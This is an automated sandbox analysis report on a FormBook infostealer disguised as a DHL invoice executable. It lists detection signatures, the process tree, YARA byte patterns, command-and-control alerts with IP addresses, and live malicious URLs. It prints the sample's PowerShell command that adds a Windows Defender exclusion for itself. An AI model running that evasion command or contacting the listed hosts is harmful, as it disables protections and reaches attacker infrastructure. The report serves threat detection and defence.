Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe

Overview

General Information

Sample name:dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe
Analysis ID:1557059
MD5:0df139fa0f5d3a83ecff651fdd692c68
SHA1:2c6e2af9e1602bc83e5c5919c75ad4aa120c0d1b
SHA256:165f9bea48c75c958594f2d88cbe59d007f506cc49c4500dfcee93dedb6f8cac
Tags:DHLexeuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Disables UAC (registry)
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses regedit.exe to modify the Windows registry
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe (PID: 6540 cmdline: "C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe" MD5: 0DF139FA0F5D3A83ECFF651FDD692C68)
    • powershell.exe (PID: 3452 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 5768 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • regedit.exe (PID: 1804 cmdline: "C:\Windows\regedit.exe" MD5: 999A30979F6195BF562068639FFC4426)
    • csc.exe (PID: 2688 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
      • rQkTBkrqhGpTBn.exe (PID: 5608 cmdline: "C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • wextract.exe (PID: 7496 cmdline: "C:\Windows\SysWOW64\wextract.exe" MD5: B9CC7E24DB7DE2E75678761B1D8BAC3E)
          • rQkTBkrqhGpTBn.exe (PID: 3604 cmdline: "C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7688 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
    • WerFault.exe (PID: 4308 cmdline: C:\Windows\system32\WerFault.exe -u -p 6540 -s 1348 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2be10:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13e9f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    0000000D.00000002.4140304298.0000000000D20000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000D.00000002.4140304298.0000000000D20000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2be10:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13e9f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000004.00000002.2074798692.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 13 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        4.2.csc.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          4.2.csc.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e5a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16632:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          4.2.csc.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            4.2.csc.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2f3a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17432:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe", ParentImage: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, ParentProcessId: 6540, ParentProcessName: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe" -Force, ProcessId: 3452, ProcessName: powershell.exe
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe", ParentImage: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, ParentProcessId: 6540, ParentProcessName: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe" -Force, ProcessId: 3452, ProcessName: powershell.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe", ParentImage: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, ParentProcessId: 6540, ParentProcessName: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe" -Force, ProcessId: 3452, ProcessName: powershell.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-17T08:35:54.803469+010020507451Malware Command and Control Activity Detected192.168.2.4497423.33.130.19080TCP
            2024-11-17T08:36:18.451019+010020507451Malware Command and Control Activity Detected192.168.2.44983864.225.91.7380TCP
            2024-11-17T08:36:31.864264+010020507451Malware Command and Control Activity Detected192.168.2.449915209.74.64.18780TCP
            2024-11-17T08:36:53.370528+010020507451Malware Command and Control Activity Detected192.168.2.450020162.0.215.3380TCP
            2024-11-17T08:37:06.722391+010020507451Malware Command and Control Activity Detected192.168.2.4500243.33.130.19080TCP
            2024-11-17T08:37:20.466700+010020507451Malware Command and Control Activity Detected192.168.2.45002898.124.224.1780TCP
            2024-11-17T08:37:33.867748+010020507451Malware Command and Control Activity Detected192.168.2.45003267.223.117.16980TCP
            2024-11-17T08:37:48.046200+010020507451Malware Command and Control Activity Detected192.168.2.4500363.33.130.19080TCP
            2024-11-17T08:38:01.586729+010020507451Malware Command and Control Activity Detected192.168.2.4500403.33.130.19080TCP
            2024-11-17T08:38:14.915984+010020507451Malware Command and Control Activity Detected192.168.2.4500443.33.130.19080TCP
            2024-11-17T08:38:28.976984+010020507451Malware Command and Control Activity Detected192.168.2.450048172.217.18.1980TCP
            2024-11-17T08:38:42.698493+010020507451Malware Command and Control Activity Detected192.168.2.45005213.248.169.4880TCP
            2024-11-17T08:38:58.943682+010020507451Malware Command and Control Activity Detected192.168.2.4500563.33.130.19080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-17T08:36:10.681399+010028554641A Network Trojan was detected192.168.2.44979264.225.91.7380TCP
            2024-11-17T08:36:13.243548+010028554641A Network Trojan was detected192.168.2.44980764.225.91.7380TCP
            2024-11-17T08:36:15.795679+010028554641A Network Trojan was detected192.168.2.44982264.225.91.7380TCP
            2024-11-17T08:36:24.257088+010028554641A Network Trojan was detected192.168.2.449869209.74.64.18780TCP
            2024-11-17T08:36:26.754764+010028554641A Network Trojan was detected192.168.2.449884209.74.64.18780TCP
            2024-11-17T08:36:29.320780+010028554641A Network Trojan was detected192.168.2.449900209.74.64.18780TCP
            2024-11-17T08:36:45.687951+010028554641A Network Trojan was detected192.168.2.449989162.0.215.3380TCP
            2024-11-17T08:36:48.234082+010028554641A Network Trojan was detected192.168.2.450001162.0.215.3380TCP
            2024-11-17T08:36:50.826946+010028554641A Network Trojan was detected192.168.2.450017162.0.215.3380TCP
            2024-11-17T08:36:59.083627+010028554641A Network Trojan was detected192.168.2.4500213.33.130.19080TCP
            2024-11-17T08:37:01.830447+010028554641A Network Trojan was detected192.168.2.4500223.33.130.19080TCP
            2024-11-17T08:37:04.176598+010028554641A Network Trojan was detected192.168.2.4500233.33.130.19080TCP
            2024-11-17T08:37:12.618902+010028554641A Network Trojan was detected192.168.2.45002598.124.224.1780TCP
            2024-11-17T08:37:15.155421+010028554641A Network Trojan was detected192.168.2.45002698.124.224.1780TCP
            2024-11-17T08:37:17.703737+010028554641A Network Trojan was detected192.168.2.45002798.124.224.1780TCP
            2024-11-17T08:37:26.242161+010028554641A Network Trojan was detected192.168.2.45002967.223.117.16980TCP
            2024-11-17T08:37:28.797666+010028554641A Network Trojan was detected192.168.2.45003067.223.117.16980TCP
            2024-11-17T08:37:31.349528+010028554641A Network Trojan was detected192.168.2.45003167.223.117.16980TCP
            2024-11-17T08:37:39.569655+010028554641A Network Trojan was detected192.168.2.4500333.33.130.19080TCP
            2024-11-17T08:37:42.107536+010028554641A Network Trojan was detected192.168.2.4500343.33.130.19080TCP
            2024-11-17T08:37:44.661726+010028554641A Network Trojan was detected192.168.2.4500353.33.130.19080TCP
            2024-11-17T08:37:54.657728+010028554641A Network Trojan was detected192.168.2.4500373.33.130.19080TCP
            2024-11-17T08:37:56.327332+010028554641A Network Trojan was detected192.168.2.4500383.33.130.19080TCP
            2024-11-17T08:37:59.057631+010028554641A Network Trojan was detected192.168.2.4500393.33.130.19080TCP
            2024-11-17T08:38:08.139589+010028554641A Network Trojan was detected192.168.2.4500413.33.130.19080TCP
            2024-11-17T08:38:09.809608+010028554641A Network Trojan was detected192.168.2.4500423.33.130.19080TCP
            2024-11-17T08:38:12.368620+010028554641A Network Trojan was detected192.168.2.4500433.33.130.19080TCP
            2024-11-17T08:38:21.128979+010028554641A Network Trojan was detected192.168.2.450045172.217.18.1980TCP
            2024-11-17T08:38:23.500997+010028554641A Network Trojan was detected192.168.2.450046172.217.18.1980TCP
            2024-11-17T08:38:26.047633+010028554641A Network Trojan was detected192.168.2.450047172.217.18.1980TCP
            2024-11-17T08:38:34.901319+010028554641A Network Trojan was detected192.168.2.45004913.248.169.4880TCP
            2024-11-17T08:38:37.549598+010028554641A Network Trojan was detected192.168.2.45005013.248.169.4880TCP
            2024-11-17T08:38:40.010481+010028554641A Network Trojan was detected192.168.2.45005113.248.169.4880TCP
            2024-11-17T08:38:49.249571+010028554641A Network Trojan was detected192.168.2.4500533.33.130.19080TCP
            2024-11-17T08:38:50.909685+010028554641A Network Trojan was detected192.168.2.4500543.33.130.19080TCP
            2024-11-17T08:38:53.573643+010028554641A Network Trojan was detected192.168.2.4500553.33.130.19080TCP
            2024-11-17T08:39:05.537341+010028554641A Network Trojan was detected192.168.2.4500573.33.130.19080TCP
            2024-11-17T08:39:07.190058+010028554641A Network Trojan was detected192.168.2.4500583.33.130.19080TCP
            2024-11-17T08:39:10.044833+010028554641A Network Trojan was detected192.168.2.4500593.33.130.19080TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://www.gcast.video/9kvp/?Y8i=irFuJh4j2fCN/xdLIJkju+0Ww/aOPRv0cSVSUNzcrQBJ8yd3G+0Gay8rhpLSBKnoinj5jjn5ajFjqPJaFJwFxtDWOxi5ujV2lXqfQRwRqrJQ238DxciUY6U=&gvyXe=EtxTw6OpYVppMBAvira URL Cloud: Label: malware
            Source: http://www.gcast.video/9kvp/Avira URL Cloud: Label: malware
            Source: http://www.arcare.partners/veiq/?gvyXe=EtxTw6OpYVppMB&Y8i=ZaCIZuFl7wZEptGr8oGQP+xb0A/J37Yq6QCg9bOCsWn91ieeFGXGB3UxVSoIIHFs/R2ofeQV0TveU8WhT6zXata70k2wUe2St57OOyVKg7CHUyAKXe1z7Nw=Avira URL Cloud: Label: malware
            Multi AV Scanner detection for submitted file
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeReversingLabs: Detection: 47%
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeVirustotal: Detection: 45%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 4.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.4140304298.0000000000D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2074798692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.4142164546.0000000005360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.4140267279.0000000000CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2075004528.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.4140287170.0000000002670000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2075245562.0000000005A60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeJoe Sandbox ML: detected

            Exploits

            barindex
            Yara detected UAC Bypass using CMSTP
            Source: Yara matchFile source: 00000000.00000002.1847215159.000002B40039F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe PID: 6540, type: MEMORYSTR
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C8F6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: .pdbHJp source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1846210334.000000F06B1F3000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: wextract.pdb source: csc.exe, 00000004.00000002.2074916274.00000000052B8000.00000004.00000020.00020000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000C.00000002.4139831429.0000000000A08000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C8F6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Windows.Forms.ni.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb.0M source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C8F6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Drawing.ni.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: wntdll.pdb source: csc.exe, csc.exe, 00000004.00000003.1984836157.00000000053B5000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000004.00000003.1986270313.0000000005569000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000004.00000002.2075036679.00000000058AE000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, wextract.exe, 0000000D.00000003.2076822878.0000000004230000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 0000000D.00000003.2078180097.00000000043E1000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.PDB405(z source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1846210334.000000F06B1F3000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: StrongNameFreeBufferStrongNameTokenFromPublicKeyStrongNameErrorInfo.PDBdiasymreader.dllDllGetClassObject%X%X%X%X%X%X%X%X%X%X%X.TMP0x%016I64xCSCalink.dll with IAlink3 source: wextract.exe, 0000000D.00000002.4141477691.0000000004C6C000.00000004.10000000.00040000.00000000.sdmp, wextract.exe, 0000000D.00000002.4140392586.0000000004237000.00000004.00000020.00020000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000E.00000000.2141501567.0000000002F2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.2368705885.000000001EA9C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C8DF000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Drawing.ni.pdbRSDS source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: mscorlib.pdbh source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C840000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbk source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C8F6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbh source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C8F6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: csc.pdbF source: wextract.exe, 0000000D.00000002.4141477691.0000000004C6C000.00000004.10000000.00040000.00000000.sdmp, wextract.exe, 0000000D.00000002.4140392586.0000000004237000.00000004.00000020.00020000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000E.00000000.2141501567.0000000002F2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.2368705885.000000001EA9C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: System.Xml.ni.pdbRSDS# source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: pC:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.PDB source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1846210334.000000F06B1F3000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Core.ni.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: Microsoft.VisualBasic.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C8F6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: rQkTBkrqhGpTBn.exe, 0000000C.00000002.4139357076.00000000001EE000.00000002.00000001.01000000.00000009.sdmp, rQkTBkrqhGpTBn.exe, 0000000E.00000000.2140751546.00000000001EE000.00000002.00000001.01000000.00000009.sdmp
            Source: Binary string: mscorlib.ni.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C8F6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\mscorlib.pdb source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C8F6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: csc.pdb source: wextract.exe, 0000000D.00000002.4141477691.0000000004C6C000.00000004.10000000.00040000.00000000.sdmp, wextract.exe, 0000000D.00000002.4140392586.0000000004237000.00000004.00000020.00020000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000E.00000000.2141501567.0000000002F2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.2368705885.000000001EA9C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: System.Xml.ni.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: wextract.pdbGCTL source: csc.exe, 00000004.00000002.2074916274.00000000052B8000.00000004.00000020.00020000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000C.00000002.4139831429.0000000000A08000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C8F6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdbRSDS source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: System.Xml.pdbp^ source: WER21A5.tmp.dmp.7.dr
